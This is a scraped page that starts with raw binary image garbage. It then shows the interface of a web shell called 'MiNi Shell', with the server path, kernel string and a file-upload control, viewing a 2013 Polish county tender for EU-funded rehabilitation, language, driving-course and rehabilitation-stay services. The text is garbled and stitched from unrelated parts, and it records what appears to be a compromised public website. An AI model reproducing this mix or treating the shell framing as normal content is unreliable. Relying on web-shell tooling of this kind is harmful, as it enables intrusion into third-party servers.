JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130523/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130523/200610-N-2013.html

<p class="kh_header"><b>Bielsko-Biała: Organizacja i przeprowadzenie form wsparcia w ramach realizowanego projektu pt. Droga do aktywności - aktywizacja społeczna i zawodowa mieszkańców powiatu bielskiego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2 
Program Operacyjny Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 200610 - 2013; data zamieszczenia: 23.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Bielski , ul. Piastowska 40, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 8136800, faks 033 8220672.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.bielsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie form wsparcia w ramach realizowanego projektu pt. Droga do aktywności - aktywizacja społeczna i zawodowa mieszkańców powiatu bielskiego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2 
Program Operacyjny Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 

Organizacja i przeprowadzenie form wsparcia w ramach realizowanego projektu pt. Droga do aktywności - aktywizacja społeczna i zawodowa mieszkańców powiatu bielskiego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2 Program Operacyjny Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.

W związku z uczestniczeniem przez osoby skierowane w różnych formach wsparcia 
w ramach projektu, szczegółowe harmonogramy w wersji ostatecznej na każdą 
z części zamówienia ustalane będą z Wykonawcą przed podpisaniem umowy. 

Wykonawca musi prowadzić realizację przedmiotu zamówienia zgodnie 
z Wytycznymi w zakresie kwalifikowania wydatków w ramach programu Operacyjnego Kapitał Ludzki z dnia 14 sierpnia 2012r. zamieszczonymi na stronie www.efs.slaskie.pl.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 80.58.00.00-3, 80.41.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w/w warunku, dla części nr IV jeśli Wykonawca złoży  aktualne zaświadczenie o wpisie do Rejestru Organizatorów Turnusów Rehabilitacyjnych dla osób niepełnosprawnych oraz aktualne zaświadczenie o wpisie do Rejestru ośrodków, w których mogą odbywać się turnusy rehabilitacyjne dla osób niepełnosprawnych, które odpowiednio potwierdzają możliwość organizowania turnusów rehabilitacyjnych oraz możliwość przyjmowania osób ze wszystkimi schorzeniami wymienionymi w części nr IV zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w/w warunku, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować potencjałem technicznym niezbędnym do realizacji zamówienia w tym:
  
- dla części nr: III minimum 2 samochody osobowe do zajęć praktycznych, identyczne jak podczas egzaminu w WORD.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w/w warunku, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować osobami zdolnymi do wykonania zamówienia w tym:

- dla części nr: I przynajmniej 1 osoba posiadająca wykształcenie co najmniej wyższe magisterskie o kierunku fizykoterapia, fizjoterapia lub rehabilitacja oraz posiada minimum 2 letnie doświadczenie pracy w zawodzie

- dla części nr: II przynajmniej 1 osoba posiadająca wykształcenie, co najmniej wyższe magisterskie o kierunku filologia angielska oraz od co najmniej 2 lat zatrudniona na stanowisku nauczyciela języka angielskiego lub lektora języka angielskiego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz ofertowy :
dla części nr I  Załącznik nr 1a do SIWZ;
dla części nr II  Załącznik nr 1b do SIWZ;
dla części nr III  Załącznik nr 1c do SIWZ;
dla części nr IV  Załącznik nr 1d do SIWZ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)Na podstawie przepisu art.144 ust.1 Ustawy Prawo Zamówień Publicznych Zamawiający dopuszcza możliwość zmiany treści umowy w stosunku do oferty w zakresie terminu wykonania umowy, za obopólną zgodą stron, tylko w następujących przypadkach:

a)konieczności przesunięcia terminu realizacji przedmiotu zamówienia z przyczyn leżących po stronie Zamawiającego, a dotyczących uczestników/uczestniczek projektu.
2)Dopuszcza się zmianę treści umowy w zakresie dotyczącym:
a)zmniejszenia/zwiększenia ilości osób skierowanych,
b)zmniejszenia/zwiększenia liczby realizowanych godzin - dla części I, II i III zamówienia,
c)zmiany miejsca realizacji przedmiotu zamówienia, pod warunkiem spełnienia kryteriów szczegółowo opisanych w SIWZ - dla części II, III i IV zamówienia,
d)w przypadku uzasadnionej konieczności zmiany osób (np. choroba), które będą uczestniczyć w wykonywaniu umowy na inne legitymujące się co najmniej równoważnymi kwalifikacjami zawodowymi, doświadczeniem, wykształceniem, które było wymagane przez Zamawiającego w SIWZ i w ogłoszeniu - dla części I i II zamówienia,
e)zmiany osób występujących po stronie Zamawiającego lub Wykonawcy, o których mowa w §6 umowy,
f)zmiany adresu/siedziby Zamawiającego lub Wykonawcy.
3)Przesłanki zmiany umowy nie mogą wynikać z przyczyn leżących po stronie Wykonawcy, jak również muszą być jedynymi okolicznościami uzasadniającymi taką zmianę. 
4)Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają formy pisemnej pod rygorem ich nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.bielsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Bielsku-Białej 
43-300 Bielsko-Biała, ul. Piastowska 40, pok. 202, II piętro bud. A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2013 godzina 08:45, miejsce: Powiatowe Centrum Pomocy Rodzinie w Bielsku-Białej 
43-300 Bielsko-Biała, ul. Piastowska 40, pok. 202, II piętro bud. A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt. Droga do aktywności - aktywizacja społeczna i zawodowa mieszkańców powiatu bielskiego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2 Program Operacyjny Kapitał Ludzki współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie indywidualnych usług rehabilitacyjnych dla uczestników/uczestniczek projektu -  mieszkańców/mieszkanek powiatu bielskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce realizacji usługi - miejsce zamieszkania niepełnosprawnego uczestnika/uczestniczki projektu na terenie Powiatu Bielskiego.
Liczba planowanych godzin rehabilitacji dla skierowanych uczestników/uczestniczek
Max.: 300 godzin zegarowych
Min.: 150 godzin zegarowych

Dodatkowe wymagania:
- prowadzenie indywidualnych kart świadczonych usług,
- przeprowadzenie wśród uczestników/uczestniczek ankiet ewaluacyjnych na zakończenie usługi.
Wzory w/w dokumentów przekazuje Zamawiający.
Przewidujemy rozliczenie za każdą zrealizowaną godzinę usługi rehabilitacyjnej.
Zamawiający dopuszcza możliwość zwiększenia lub zmniejszenia liczby godzin. 

Cena usługi powinna zawierać koszty dojazdu rehabilitanta do miejsca zamieszkania osoby korzystającej z rehabilitacji. Uwaga: samo świadczenie usługi powinno trwać 1 godzinę zegarową w miejscu zamieszkania osoby rehabilitowanej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie Kursu języka angielskiego w wymiarze 60 godzin szkoleniowych/osoba..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Godzina szkoleniowa = 45 minut. Uczestnikami/Uczestniczkami kursu będą uczestnicy/uczestniczki projektu -  osoby z terenu powiatu bielskiego o różnym stopniu zaawansowania znajomości języka angielskiego: 
-osoby niepełnosprawne - ok. 18 osób
-osoby usamodzielniane - ok. 13 osób.

Miejsce realizacji usługi powinno być zlokalizowane na terenie miasta Bielsko-Biała. 
Ze względu na różny stopień zaawansowania znajomości języka uczestników/uczestniczek projektu, ich udział w innych formach wsparcia, a także inne ograniczenia dostępności (np. zajęcia szkolne) należy przewidzieć elastyczny harmonogram zajęć (dogodne terminy/godziny dla każdego z kursantów).

Cena usługi powinna zawierać koszty:
wynagrodzenia lektorów; sal dydaktycznych, materiałów szkoleniowych (tj. podręcznik, teczka papierowa, notatnik A4, długopis) w tym jednego kompletu wzorcowego dla Zamawiającego; poczęstunku: drobne ciasteczka, woda mineralna, kawa, herbata; certyfikatów/zaświadczeń potwierdzających uczestnictwo w kursie; zwrotu kosztów dojazdu na zajęcia do wysokości ceny najtańszego biletu na danej trasie; przeprowadzenia wstępnych testów kwalifikacyjnych określających poziom zaawansowania skierowanych uczestników/uczestniczek; koszty ubezpieczenia NNW skierowanych uczestników/uczestniczek kursu; przeprowadzenia wśród uczestników/uczestniczek projektu ankiet ewaluacyjnych; prawidłowe oznakowanie dokumentacji i sal szkoleniowych zgodnie 
z wymogami PO KL (wzory ankiet i innych dokumentów dostarcza Zamawiający).
Możliwość realizacji usługi w dniach: od poniedziałku do piątku z uwzględnieniem godzin popołudniowych.
Maksymalna liczba osób skierowanych: 31
Minimalna liczba osób skierowanych: 27
Wykonawca zapewni skierowanym uczestnikom/uczestniczkom naukę w grupach maksymalnie 10-osobowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.58.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie Kursu prawa jazdy kat. B dla uczestników/uczestniczek projektu - mieszkańców/mieszkanek powiatu bielskiego tj. osoby niepełnosprawne i osoby usamodzielniane..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cena usługi powinna zawierać koszty:
wynagrodzenia instruktorów, badań lekarskich, sal dydaktycznych, materiałów szkoleniowych, w tym jeden komplet wzorcowy dla Zamawiającego, zaświadczeń potwierdzających ukończenie kursu, ubezpieczenia NNW uczestników/uczestniczek kursu, egzaminu wewnętrznego teoretycznego i praktycznego, pierwszego egzaminu państwowego teoretycznego i praktycznego, zwrotu kosztów dojazdu na zajęcia do wysokości ceny najtańszego biletu na danej trasie, przeprowadzenia wśród uczestników/uczestniczek projektu ankiet ewaluacyjnych, prawidłowe oznakowanie dokumentacji i sal szkoleniowych zgodnie 
z wymogami PO KL (wzory ankiet i innych dokumentów dostarcza Zamawiający)

Miejsce realizacji usługi: powinno być zlokalizowane na terenie miasta Bielsko-Biała

Możliwość realizacji zajęć teoretycznych: od poniedziałku do soboty z uwzględnieniem godzin popołudniowych.

Maksymalna liczba osób skierowanych: 26, w tym 7 osób niepełnosprawnych z różnymi rodzajami schorzeń (brak osób niepełnosprawnych, dla których byłby potrzebny specjalistycznie oprzyrządowany samochód). Ostateczną decyzję w zakresie możliwości realizacji kursu przez skierowane osoby podejmie lekarz po przeprowadzeniu badania lekarskiego.
Minimalna liczba osób skierowanych: 20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie jednego 14-dniowego turnusu rehabilitacyjnego usprawniająco - rekreacyjnego wraz z Treningiem interpersonalnym dla niepełnosprawnych uczestników/uczestniczek projektu i ich opiekunów wraz 
z dowozem i przywozem powrotnym..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Turnus należy przeprowadzić w miejscowości turystycznej nad morzem.
Turnus rozpoczyna się obiadokolacją i kończy się śniadaniem w dniu wyjazdu. Organizator musi zapewnić wszystkim uczestnikom/uczestniczkom i ich opiekunom suchy prowiant na drogę powrotną oraz wodę mineralną. 
Ośrodek musi być dostosowany do potrzeb osób niepełnosprawnych z następującymi schorzeniami:
- z chorobami neurologicznymi,
- z chorobami układu moczowo-płciowego,
- z chorobami układu pokarmowego,
- z chorobą psychiczną,
- z upośledzeniem umysłowym, 
- z cukrzycą,
- z dysfunkcją narządu ruchu, z wyłączeniem osób poruszających się na wózkach inwalidzkich,
- z dysfunkcją narządu słuchu,
- ze schorzeniami układu krążenia,
- ze schorzeniami onkologicznymi,
- z padaczką/epilepsją,
- kobiety po mastektomii.
Należy odpowiednio wypełnić formularz ofertowy stanowiący załącznik Nr 1d do SIWZ poprzez wskazanie dokładnie 14 dni trwania turnusu rehabilitacyjnego wraz z dowozem i przywozem powrotnym w przedziale czasowym określonym przez Zamawiającego. 
Maksymalna liczba osób skierowanych: 25 osób niepełnosprawnych i 8 opiekunów 
Minimalna liczba osób skierowanych: 21 osób niepełnosprawnych i 3 opiekunów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com